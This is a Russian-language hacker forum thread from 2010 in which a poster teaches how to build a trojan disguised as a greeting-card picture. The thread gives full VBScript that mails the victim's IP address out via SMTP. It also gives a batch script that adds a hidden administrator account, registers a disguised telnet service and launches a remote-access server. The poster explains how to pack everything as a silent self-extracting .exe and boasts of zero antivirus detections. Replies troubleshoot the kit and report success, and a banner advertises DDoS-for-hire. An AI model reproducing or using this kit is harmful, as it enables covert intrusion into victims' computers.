Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку . - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 





Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Все инфопродукты и приватная информация бесплатно
Старый 28.08.2010, 11:10   #1 (permalink)
HTTP/S
 
Аватар для hack-win32
 
Регистрация: 17.07.2009
Сообщений: 36
Member ID: 1341
ICQ 456527

Репутация: 61
Репутация: 61
Сказал(а) спасибо: 76
Поблагодарили 57 раз(а) в 25 сообщениях
Топикстартер (автор темы) Круто Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Дата: 20.08.2010 на момент создания темы троян не палился не одним из 40 антивирусов
Сейчас я покажу как написать трояна который будет открывать 23[telnet] и 28137[FTP] порт , будет один файл *.exe , юзер откроет его , а там откроется картинка , не каких лишних окон выходить не будет .
Для начала скачиваем прогу Yoozy

Для создания трояна нужны файлы :
1)YoozyServer.exe - находится в архиве
2)любая картинка с названием 123.jpg
3)mail.vbs - этот файл присылает ip на мыло
4)user.bat - нужно создать ярлык этого файла


Исходник mail.vbs
Цитата:
Const FOF_SIMPLEPROGRESS = 256
Dim MySource, MyTarget, MyHex, MyBinary, i
Dim oShell, oCTF
Dim oFileSys
dim winShell
dim newfolderpath
dim t
On Error Resume Next
h = Hour(Now)
m = Minute(Now)
s = Second(Now)
t = date() & "-" & h & "-" & m & "-" & s
dim filesys, newfolder
newfolderpath = "c:\12345" ' Название временной папки
set filesys=CreateObject("Scripting.FileSystemObject")
If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
End If
set filesys=Nothing
Set newfolder=Nothing

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c ipconfig > C:\12345\ip.txt", 0, false

WScript.Sleep (5000)

Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost("smtp.mail.ru","куда придёт айпи","левое мыло с @mail.ru","IP ЛАМЕРА","ИПЫ")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,s trBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="здесь логин левого мыла без @mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="здесь пароль от левого мыла"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
iMsg.AddAttachment "C:\12345\ip.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing


Исходник user.bat
Цитата:
@Echo off
start C:\mail.vbs
start C:\123.jpg
chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 1 /add
net localgroup "Администраторы" SUPPORT_388945a0 /add
net localgroup "Пользователи" SUPPORT_388945a0 /del
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
sc config tlntsvr start= auto
tlntadmn config port=23 sec=-NTLM
net start Telnet
start C:\YoozyServer.exe
Этот код создаст юзера с логином : SUPPORT_388945a0 и паролем : 1 , для подключения через 23 порт , юзер будет скрыт и не будет отображатся .

Скрины :
Все 4 файла



Создание ярлыка user.bat







Winrar
Настройки в winrar'e , нужно выделить всё и щёлкнуть правой кнопкой мыши , и выбрать "Добавить в архив", дадим название файлу Окрытка.exe

После нажимаем "Дополнительно" "Параметры SFX"

После нажимаем на вкладку "Режимы" и ставим галочку на "скрыть всё"

Нажимаем на вкладку "текст и графика" там есть функция "Загрузить значок SFX из файла" скачиваем с инета иконки указываем пуь , после нажимаем "ок" "ок" и у нас должен получится один файл "Открытка.exe"
Пример:



Далее закидываем жертве и ждём ip , после того как ip пришёл Открываем Yoozy.exe (не вздумайте открыть YoozyServer.exe) вводим ip и мы имеем полный доступ к файлам , а чтоб подключится через telnet , заходим Пуск-Выполнить- telnet.exe или зажимаем клавиши windows+r .


Отчёт на вирусы :
Цитата:
File name:
otkrytka.exe
Submission date:
2010-08-28 14:48:57 (UTC)
Current status:
finished
Result:
0/ 40 (0.0%) VT Community

not reviewed
Safety score: -

Compact
Print results Antivirus Version Last Update Result
AhnLab-V3 2010.08.29.00 2010.08.28 -
AntiVir 8.2.4.46 2010.08.28 -
Antiy-AVL 2.0.3.7 2010.08.26 -
Authentium 5.2.0.5 2010.08.28 -
Avast 4.8.1351.0 2010.08.28 -
Avast5 5.0.594.0 2010.08.28 -
AVG 9.0.0.851 2010.08.28 -
BitDefender 7.2 2010.08.28 -
CAT-QuickHeal 11.00 2010.08.28 -
ClamAV 0.96.2.0-git 2010.08.28 -
Comodo 5888 2010.08.28 -
DrWeb 5.0.2.03300 2010.08.28 -
Emsisoft 5.0.0.37 2010.08.28 -
eSafe 7.0.17.0 2010.08.26 -
eTrust-Vet 36.1.7823 2010.08.27 -
F-Prot 4.6.1.107 2010.08.28 -
F-Secure 9.0.15370.0 2010.08.28 -
Fortinet 4.1.143.0 2010.08.28 -
GData 21 2010.08.28 -
Ikarus T3.1.1.88.0 2010.08.28 -
Jiangmin 13.0.900 2010.08.28 -
Kaspersky 7.0.0.125 2010.08.28 -
McAfee 5.400.0.1158 2010.08.28 -
Microsoft 1.6103 2010.08.28 -
NOD32 5404 2010.08.28 -
Norman 6.05.11 2010.08.28 -
nProtect 2010-08-28.01 2010.08.28 -
PCTools 7.0.3.5 2010.08.28 -
Prevx 3.0 2010.08.28 -
Rising 22.62.05.03 2010.08.28 -
Sophos 4.56.0 2010.08.28 -
Sunbelt 6806 2010.08.28 -
SUPERAntiSpyware 4.40.0.1006 2010.08.28 -
Symantec 20101.1.1.7 2010.08.28 -
TheHacker 6.5.2.1.356 2010.08.26 -
TrendMicro 9.120.0.1004 2010.08.28 -
TrendMicro-HouseCall 9.120.0.1004 2010.08.28 -
VBA32 3.12.14.0 2010.08.27 -
ViRobot 2010.8.28.4013 2010.08.28 -
VirusBuster 5.0.27.0 2010.08.27 -
Видео --> http://multi-up.com/327523

(с)hack-win32 , hack001

Последний раз редактировалось hack-win32; 29.08.2010 в 05:03.
hack-win32 вне форума   Ответить с цитированием
15 пользователя(ей) сказали cпасибо:
Старый 30.08.2010, 06:47   #2 (permalink)
VPN
 
Аватар для 2FED
 
Регистрация: 11.05.2009
Адрес: Сибирь
Сообщений: 458
Member ID: 4
ICQ 310234

Репутация: 855
Репутация: 855
Сказал(а) спасибо: 599
Поблагодарили 516 раз(а) в 199 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

За старания +,но тема старая.
2FED вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 30.08.2010, 11:42   #3 (permalink)
VPN
 
Аватар для Flanker
 
Регистрация: 23.05.2009
Сообщений: 476
Member ID: 244

Репутация: 563
Репутация: 563
Сказал(а) спасибо: 776
Поблагодарили 511 раз(а) в 272 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Всегда думал, что порт FTP - 21
Flanker вне форума   Ответить с цитированием
Старый 30.08.2010, 14:36   #4 (permalink)
SOCKS5
 
Аватар для kronos
 
Регистрация: 14.05.2009
Сообщений: 218
Member ID: 98

Репутация: 247
Репутация: 247
Сказал(а) спасибо: 191
Поблагодарили 194 раз(а) в 93 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Flanker, порт можно поставить фактически любой.Хотя по стандарту это 21-ый порт.
__________________
---
Ушол в мир другой.
kronos вне форума   Ответить с цитированием
Старый 04.09.2010, 09:10   #5 (permalink)
SOCKS4
 
Аватар для MiLorD
 
Регистрация: 14.01.2010
Сообщений: 166
Member ID: 5824
ICQ 476938
Skype rraamiill

Репутация: 218
Репутация: 218
Сказал(а) спасибо: 79
Поблагодарили 94 раз(а) в 54 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Что вводить когда в архиваторе настраиваешь в поле "Выполнить после распоковки:"
А ту неочень видно
__________________
MiLorD вне форума   Ответить с цитированием
Старый 09.09.2010, 03:30   #6 (permalink)
HTTP
 
Регистрация: 21.03.2010
Сообщений: 1
Member ID: 7126

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Вот тут видос по теме на досуге заснял:

http://www.youtube.com/watch?v=rsYweiBfTZo

может кому пригодится
Versus71 вне форума   Ответить с цитированием
Старый 27.09.2010, 14:45   #7 (permalink)
HTTP
 
Регистрация: 26.09.2010
Сообщений: 3
Member ID: 9460

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 2
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Цитата:
Сообщение от ramiel Посмотреть сообщение
Что вводить когда в архиваторе настраиваешь в поле "Выполнить после распоковки
Ввести имя user.bat файла плюс .lnk на конце - название ярлыка. Если не ошибаюсь.

Автору спасибо, "Открытка" - приготовлена
Hohot вне форума   Ответить с цитированием
Старый 30.09.2010, 13:15   #8 (permalink)
tin
HTTP
 
Регистрация: 31.01.2010
Сообщений: 12
Member ID: 6369

Репутация: 1
Репутация: 1
Сказал(а) спасибо: 5
Поблагодарили 1 раз в 1 сообщении
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

господа предприниматели ))))) подскажите мне, почему такая бойда происходит, делаю все как написано и показано, все получается без вопросов, но вот пробую на другой тачки открыть ехе открытка выскакивает сообщение

,


что user.bat.lnk не найден? хотя когда пакую этот фаил точно там тоже есть . Также и на других еще 2х компах.


и еще вопрос, после перегрузки тачки, всеравно можно подключиться будет к ней, или всего один раз и все?

Последний раз редактировалось tin; 30.09.2010 в 22:02.
tin вне форума   Ответить с цитированием
Старый 30.09.2010, 19:06   #9 (permalink)
HTTP
 
Регистрация: 12.09.2010
Сообщений: 3
Member ID: 9272

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: Взлом компа , открываем 23[telnet] и 28137[FTP] через открытку .

Все конечно хорошо расписано, но при использовании этой темы отпадают компы, которые подключены через современные роутера\маршрутизаторы (там в большинстве случаев уже идет залочение портов)
Fr@UdeR вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сайта Сергея Доренко через XSS QIP Системы и сети, взлом и защита, анонимность в сети 0 03.08.2010 10:04
Как через telnet включить RDP? Снипер Флейм 1 08.07.2010 16:55
telnet на дедике tuman Работа с дедиками 8 03.06.2010 14:51
Взлом компа через Radmin[4899 порт] hack-win32 Системы и сети, взлом и защита, анонимность в сети 0 11.10.2009 21:23
Взлом самого крупного файлообменника через xss aston Системы и сети, взлом и защита, анонимность в сети 4 07.08.2009 23:51




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.